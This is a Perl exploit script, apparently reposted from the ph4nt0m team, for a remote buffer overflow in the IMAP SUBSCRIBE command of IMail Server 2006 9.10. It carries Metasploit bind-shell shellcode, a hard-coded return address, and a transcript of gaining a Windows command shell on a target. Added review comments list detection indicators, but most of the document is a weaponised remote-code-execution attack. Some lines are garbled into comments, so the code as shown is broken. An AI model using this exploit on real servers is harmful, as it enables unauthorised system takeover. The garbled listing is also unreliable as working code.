IPSwitch IMail Server 2006 9.10 SUBSCRIBE Remote Overflow Exploit
来源:www.ph4nt0m.org 作者:yunshu 发布时间:2007-07-27
#!/use/bin/perl
# Test on Imail 2006(9.10), imap4d32.exe(6.8.8.1), windows 2003 Chinese SP1 # Code by yunshu, our team: www.ph4nt0m.org Mail list: http://list.ph4nt0m.org
#F:\>perl imail_SUBSCRIBE.pl 192.168.1.2 test_user test_pass #* OK IMAP4 Server (IMail 9.10) #0 OK LOGIN completed #* FLAGS (\Answered \Flagged \Deleted \Seen \Draft) #* 0 EXISTS #* 0 RECENT #* OK [UIDVALIDITY 1185270594] UIDs valid #* OK [UIDNEXT 485270595] Predicted next UID #2 OK [READ-WRITE] SELECT completed #3 OK SUBSCRIBE completed #Trying.. #Bingle!Maybe get it! #You can try to telnet 22 port, do you have nc?
#D:\Microsoft Visual Studio 8\VC>nc -vv 192.168.1.2 22 #192.168.1.2: inverse host lookup failed: h_errno 11004: NO_DATA #(UNKNOWN) [192.168.1.2] 22 (?) open #Microsoft Windows [.. 5.2.3790] #(C) .... 1985-2003 Microsoft Corp.
#C:\WINDOWS\system32>net user #net user
#\\ .....
#------------------------------------------------------------------------------- #Administrator ASPNET Guest #IUSR_WIN2K3 IWAM_WIN2K3 SUPPORT_388945a0 #..................
#C:\WINDOWS\system32>
use strict; use warnings; use IO::Socket;
# Usage guard: exactly three positional arguments are required
# (host, username, password).  Anything else prints the banner and
# exits with -1; nothing is validated beyond the argument count.
if( @ARGV != 3 ) { my $banner = qq{ Imail subscribe exploit, Test on Imail 2006(9.10),windows 2003 Chinese SP1 You must have a account to login the imap server, good luck! Code by yunshu, our team www.ph4nt0m.org, enjoin this exp~~ imail_subscribe.pl <host> <username> <password> };
print $banner."\n"; exit( -1 ); }
# Positional arguments taken as-is.  The credentials are meant for the
# IMAP LOGIN on the line tagged `# login` below; as the listing is shown
# that line has been fused into its own comment (line break lost), so
# $user/$pass are never actually used in the displayed code.  The script
# needs a valid mailbox account on the target (see the banner above).
my $host = $ARGV[0]; my $user = $ARGV[1]; my $pass = $ARGV[2];
# win32_bind - EXITFUNC=thread LPORT=22 Size=344 Encoder=Pex http://metasploit.com my $shellcode = "\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x41". "\xd1\xfd\xbc\x83\xeb\xfc\xe2\xf4\xbd\xbb\x16\xf1\xa9\x28\x02\x43". "\xbe\xb1\x76\xd0\x65\xf5\x76\xf9\x7d\x5a\x81\xb9\x39\xd0\x12\x37". "\x0e\xc9\x76\xe3\x61\xd0\x16\xf5\xca\xe5\x76\xbd\xaf\xe0\x3d\x25". "\xed\x55\x3d\xc8\x46\x10\x37\xb1\x40\x13\x16\x48\x7a\x85\xd9\x94". "\x34\x34\x76\xe3\x65\xd0\x16\xda\xca\xdd\xb6\x37\x1e\xcd\xfc\x57". "\x42\xfd\x76\x35\x2d\xf5\xe1\xdd\x82\xe0\x26\xd8\xca\x92\xcd\x37". "\x01\xdd\x76\xcc\x5d\x7c\x76\xfc\x49\x8f\x95\x32\x0f\xdf\x11\xec". "\xbe\x07\x9b\xef\x27\xb9\xce\x8e\x29\xa6\x8e\x8e\x1e\x85\x02\x6c". "\x29\x1a\x10\x40\x7a\x81\x02\x6a\x1e\x58\x18\xda\xc0\x3c\xf5\xbe". "\x14\xbb\xff\x43\x91\xb9\x24\xb5\xb4\x7c\xaa\x43\x97\x82\xae\xef". "\x12\x82\xbe\xef\x02\x82\x02\x6c\x27\xb9\xfd\xaa\x27\x82\x74\x5d". "\xd4\xb9\x59\xa6\x31\x16\xaa\x43\x97\xbb\xed\xed\x14\x2e\x2d\xd4". "\xe5\x7c\xd3\x55\x16\x2e\x2b\xef\x14\x2e\x2d\xd4\xa4\x98\x7b\xf5". "\x16\x2e\x2b\xec\x15\x85\xa8\x43\x91\x42\x95\x5b\x38\x17\x84\xeb". "\xbe\x07\xa8\x43\x91\xb7\x97\xd8\x27\xb9\x9e\xd1\xc8\x34\x97\xec". "\x18\xf8\x31\x35\xa6\xbb\xb9\x35\xa3\xe0\x3d\x4f\xeb\x2f\xbf\x91". "\xbf\x93\xd1\x2f\xcc\xab\xc5\x17\xea\x7a\x95\xce\xbf\x62\xeb\x43". "\x34\x95\x02\x6a\x1a\x86\xaf\xed\x10\x80\x97\xbd\x10\x80\xa8\xed". "\xbe\x01\x95\x11\x98\xd4\x33\xef\xbe\x07\x97\x43\xbe\xe6\x02\x6c". "\xca\x86\x01\x3f\x85\xb5\x02\x6a\x13\x2e\x2d\xd4\xae\x1f\x1d\xdc". "\x12\x2e\x2b\x43\x91\xd1\xfd\xbc";
# Plain TCP connection to the IMAP port (143), no TLS.  The `||` is safe
# here only because the constructor call is fully parenthesised; `or` is
# the conventional low-precedence form.  NOTE(review): the key is spelled
# `proto` in lowercase whereas IO::Socket::INET documents `Proto` —
# presumably ignored, with TCP being the default anyway; confirm.
my $sock = IO::Socket::INET->new( PeerHost=>$host, PeerPort=>"143", proto=>"tcp" ) || die "Connect error.\n";
# Read the server greeting and echo it.  The check is an unanchored
# substring test for "OK"; any other greeting aborts with -1.
my $res = <$sock>; print $res; if( $res !~ /OK/ ) { exit( -1 ); }
# Four-byte value written into the overflowed frame after the padding;
# presumably a return/jump address specific to the exact build named in
# the header (imap4d32.exe 6.8.8.1 on Chinese Windows 2003 SP1), which is
# why the author lists that configuration.  The commented-out "abcd"
# variant is presumably the author's crash-test marker — confirm.
my $opcode = "\x60\x1A\x9C\x76"; #my $opcode = "\x61\x62\x63\x64";
# Byte length of sled + shellcode.  The SUBSCRIBE argument built below is
# therefore ~265 KB — an IMAP mailbox name of that size is never
# legitimate and is the clearest network-side indicator for detection
# (alert on SUBSCRIBE/LSUB arguments far beyond any plausible name).
my $num = 264991;
# Payload as assembled: literal "#IMAILPUB" prefix, 0x90 padding so that
# padding + $shellcode totals $num bytes, a 2-byte short jump (\xeb\x06),
# the $opcode value, four more 0x90 bytes, a 5-byte near jump with a
# negative displacement (presumably back into the padding — confirm), and
# a 400-byte 0x90 tail.
# NOTE(review): `$shellcode` is used here but, in the listing as shown,
# its `my` declaration was swallowed into the preceding comment line
# (line break lost after the metasploit URL); under `use strict` the
# displayed text would not compile.  The header comment on that line
# identifies the payload as a Metasploit-encoded win32 bind shell.
my $nop = "#IMAILPUB" . "\x90" x ( $num - length($shellcode) ).$shellcode."\x90\x90\xeb\x06".$opcode."\x90\x90\x90\x90"."\xE9\x44\xfd\xff\xff"."\x90" x 400;
# login print $sock "0 LOGIN $user $pass\r\n"; $res = <$sock>; if( ! defined($res) ) { exit(-1); }
# Intended to check the LOGIN response from the `# login` line above.
# As the listing is shown that line is entirely a comment, so $res still
# holds the greeting already checked on the connect line; the test is
# again an unanchored substring match for "OK".
print $res; if( $res !~ /OK/ ) { exit(-1); }
# SELECT INBOX and drain responses until the tagged "2 OK" or "2 BAD"
# line.  There is no timeout on the socket, so a server that stops
# answering leaves this loop blocked indefinitely.
print $sock "2 SELECT INBOX\r\n"; while( <$sock> ) { print $_; if( $_ =~ /2 OK/ || $_ =~ /2 BAD/ ) { last; } }
# The trigger: SUBSCRIBE with the ~265 KB quoted mailbox name built
# above.  Only one response line is read.  The transcript in the file
# header shows the server still answering "3 OK SUBSCRIBE completed", so
# a normal-looking reply does not mean the input was rejected — detection
# has to key on the request size, not on the response.
print $sock "3 SUBSCRIBE \"$nop\"\r\n"; $res = <$sock>; if( ! defined($res) ) { exit(-1); } print $res;
# Fixed 15 s wait, then an unconditional success message: the script
# never verifies the outcome.  The `LPORT=22` in the payload's header
# comment and the "telnet 22 port" hint here both point at TCP/22 on the
# mail server, so an unexpected listener on that port on an IMail host
# is the host-side indicator to look for.
print "Trying..\n";
sleep( 15 ); print "Bingle! Maybe get it!\nYou can try to telnet 22 port, do you have nc?\n";
# Best-effort LOGOUT, echoing whatever the server still sends.  After the
# overflow the daemon may no longer respond, in which case this read may
# block rather than return.
print $sock "4 LOGOUT\r\n"; print <$sock>;
$sock->close();